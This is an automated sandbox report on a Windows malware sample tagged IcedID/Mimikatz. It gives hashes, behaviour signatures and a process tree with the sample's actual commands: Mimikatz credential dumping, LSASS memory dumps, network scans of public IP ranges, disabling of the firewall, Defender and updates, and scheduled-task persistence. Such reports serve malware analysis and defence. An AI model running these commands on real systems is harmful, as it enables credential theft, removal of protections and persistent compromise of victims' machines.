Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-08-2024 13:32

General

  • Target

    2024-08-27_a8c8b041b6422babad43cc88bea0b6e8_hacktools_icedid_mimikatz.exe

  • Size

    8.4MB

  • MD5

    a8c8b041b6422babad43cc88bea0b6e8

  • SHA1

    bcd758e81593bfc71f6b35d877b35dc8bfb8d8e5

  • SHA256

    29dfc665f2b70f7579586bdc75c36f731b5eedd2a9366398f6ea23c922ac9743

  • SHA512

    495525c912c870acb3da05358118b8261692bb65deb5b055e2ca5cf6c6df48c32380c13b1034cfe16108152889110f4c2fdfc0d264a6858960eb46fb9d17b4a0

  • SSDEEP

    196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (52355) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 30 IoCs
  • Loads dropped DLL 12 IoCs
  • UPX packed file 38 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 47 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2132
      • C:\Windows\TEMP\ekleagute\pcgcfj.exe
        "C:\Windows\TEMP\ekleagute\pcgcfj.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1688
    • C:\Users\Admin\AppData\Local\Temp\2024-08-27_a8c8b041b6422babad43cc88bea0b6e8_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-08-27_a8c8b041b6422babad43cc88bea0b6e8_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4688
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\bipepyze\sabzgqz.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:4068
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:1480
        • C:\Windows\bipepyze\sabzgqz.exe
          C:\Windows\bipepyze\sabzgqz.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:3700
    • C:\Windows\bipepyze\sabzgqz.exe
      C:\Windows\bipepyze\sabzgqz.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4108
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2140
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2312
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
          • System Location Discovery: System Language Discovery
          PID:3928
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1104
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
          3⤵
            PID:5024
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
              PID:1560
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
              3⤵
              • System Location Discovery: System Language Discovery
              PID:3932
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static del all
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:4680
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add policy name=Bastards description=FuckingBastards
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:1888
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filteraction name=BastardsList action=block
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:2164
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Windows\tsmmkppcn\mbklagvue\wpcap.exe /S
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4260
            • C:\Windows\tsmmkppcn\mbklagvue\wpcap.exe
              C:\Windows\tsmmkppcn\mbklagvue\wpcap.exe /S
              3⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in System32 directory
              • Drops file in Program Files directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1512
              • C:\Windows\SysWOW64\net.exe
                net stop "Boundary Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3808
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "Boundary Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1916
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2544
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                    PID:3680
                • C:\Windows\SysWOW64\net.exe
                  net stop npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1584
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:812
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2020
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:2836
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
              • System Location Discovery: System Language Discovery
              PID:2780
              • C:\Windows\SysWOW64\net.exe
                net start npf
                3⤵
                • System Location Discovery: System Language Discovery
                PID:1104
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:1304
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
                PID:3864
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:3180
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:2916
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\tsmmkppcn\mbklagvue\cibtlluza.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tsmmkppcn\mbklagvue\Scant.txt
                2⤵
                • System Location Discovery: System Language Discovery
                PID:1036
                • C:\Windows\tsmmkppcn\mbklagvue\cibtlluza.exe
                  C:\Windows\tsmmkppcn\mbklagvue\cibtlluza.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tsmmkppcn\mbklagvue\Scant.txt
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:2628
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\tsmmkppcn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\tsmmkppcn\Corporate\log.txt
                2⤵
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                PID:5048
                • C:\Windows\tsmmkppcn\Corporate\vfshost.exe
                  C:\Windows\tsmmkppcn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:880
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tnfgntztu" /ru system /tr "cmd /c C:\Windows\ime\sabzgqz.exe"
                2⤵
                  PID:5084
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                      PID:3104
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "tnfgntztu" /ru system /tr "cmd /c C:\Windows\ime\sabzgqz.exe"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:4356
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tibzeneva" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:2324
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:4000
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "tibzeneva" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:4704
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "euztfpama" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3112
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:2436
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "euztfpama" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F"
                      3⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:1356
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:2968
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1480
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:936
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:4792
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:3316
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1516
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:464
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:3600
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:2128
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:1124
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:3916
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:4416
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop SharedAccess
                    2⤵
                      PID:3688
                      • C:\Windows\SysWOW64\net.exe
                        net stop SharedAccess
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:3276
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop SharedAccess
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:3104
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c netsh firewall set opmode mode=disable
                      2⤵
                        PID:1324
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh firewall set opmode mode=disable
                          3⤵
                          • Modifies Windows Firewall
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:1892
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c netsh Advfirewall set allprofiles state off
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:3524
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh Advfirewall set allprofiles state off
                          3⤵
                          • Modifies Windows Firewall
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:1348
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop MpsSvc
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:3936
                        • C:\Windows\SysWOW64\net.exe
                          net stop MpsSvc
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:3048
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop MpsSvc
                            4⤵
                              PID:1516
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c net stop WinDefend
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:388
                          • C:\Windows\SysWOW64\net.exe
                            net stop WinDefend
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:432
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop WinDefend
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:4016
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c net stop wuauserv
                          2⤵
                            PID:3112
                            • C:\Windows\SysWOW64\net.exe
                              net stop wuauserv
                              3⤵
                                PID:440
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop wuauserv
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2084
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c sc config MpsSvc start= disabled
                              2⤵
                                PID:5084
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config MpsSvc start= disabled
                                  3⤵
                                  • Launches sc.exe
                                  PID:4420
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c sc config SharedAccess start= disabled
                                2⤵
                                  PID:4684
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config SharedAccess start= disabled
                                    3⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:3244
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c sc config WinDefend start= disabled
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2324
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config WinDefend start= disabled
                                    3⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:2244
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c sc config wuauserv start= disabled
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4384
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config wuauserv start= disabled
                                    3⤵
                                    • Launches sc.exe
                                    PID:4920
                                • C:\Windows\TEMP\xohudmc.exe
                                  C:\Windows\TEMP\xohudmc.exe
                                  2⤵
                                  • Executes dropped EXE
                                  • Drops file in System32 directory
                                  • Suspicious use of SetWindowsHookEx
                                  PID:3892
                                • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                  C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 788 C:\Windows\TEMP\tsmmkppcn\788.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1620
                                • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                  C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 316 C:\Windows\TEMP\tsmmkppcn\316.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1324
                                • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                  C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2132 C:\Windows\TEMP\tsmmkppcn\2132.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1900
                                • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                  C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2584 C:\Windows\TEMP\tsmmkppcn\2584.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3752
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c C:\Windows\tsmmkppcn\mbklagvue\scan.bat
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1304
                                  • C:\Windows\tsmmkppcn\mbklagvue\pejfeyype.exe
                                    pejfeyype.exe TCP 194.110.0.1 194.110.255.255 445 512 /save
                                    3⤵
                                    • Executes dropped EXE
                                    • Drops file in Windows directory
                                    PID:3532
                                • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                  C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2788 C:\Windows\TEMP\tsmmkppcn\2788.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5928
                                • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                  C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2888 C:\Windows\TEMP\tsmmkppcn\2888.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:6040
                                • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                  C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 1492 C:\Windows\TEMP\tsmmkppcn\1492.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5524
                                • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                  C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3828 C:\Windows\TEMP\tsmmkppcn\3828.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4016
                                • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                  C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3920 C:\Windows\TEMP\tsmmkppcn\3920.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2156
                                • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                  C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3984 C:\Windows\TEMP\tsmmkppcn\3984.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4748
                                • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                  C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 4072 C:\Windows\TEMP\tsmmkppcn\4072.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2352
                                • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                  C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2560 C:\Windows\TEMP\tsmmkppcn\2560.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:452
                                • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                  C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2740 C:\Windows\TEMP\tsmmkppcn\2740.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4596
                                • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                  C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 4816 C:\Windows\TEMP\tsmmkppcn\4816.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1152
                                • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                  C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 4776 C:\Windows\TEMP\tsmmkppcn\4776.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5208
                                • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                  C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 4448 C:\Windows\TEMP\tsmmkppcn\4448.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5856
                                • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                  C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 4524 C:\Windows\TEMP\tsmmkppcn\4524.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4972
                                • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                  C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 1304 C:\Windows\TEMP\tsmmkppcn\1304.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5528
                                • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                  C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 5032 C:\Windows\TEMP\tsmmkppcn\5032.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1480
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:5516
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4596
                                  • C:\Windows\SysWOW64\cacls.exe
                                    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:5048
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                    3⤵
                                      PID:5280
                                    • C:\Windows\SysWOW64\cacls.exe
                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:5704
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4596
                                    • C:\Windows\SysWOW64\cacls.exe
                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                      3⤵
                                        PID:1912
                                  • C:\Windows\SysWOW64\yqewma.exe
                                    C:\Windows\SysWOW64\yqewma.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetWindowsHookEx
                                    PID:4664
                                  • C:\Windows\system32\cmd.EXE
                                    C:\Windows\system32\cmd.EXE /c C:\Windows\ime\sabzgqz.exe
                                    1⤵
                                      PID:3280
                                      • C:\Windows\ime\sabzgqz.exe
                                        C:\Windows\ime\sabzgqz.exe
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetWindowsHookEx
                                        PID:3916
                                    • C:\Windows\system32\cmd.EXE
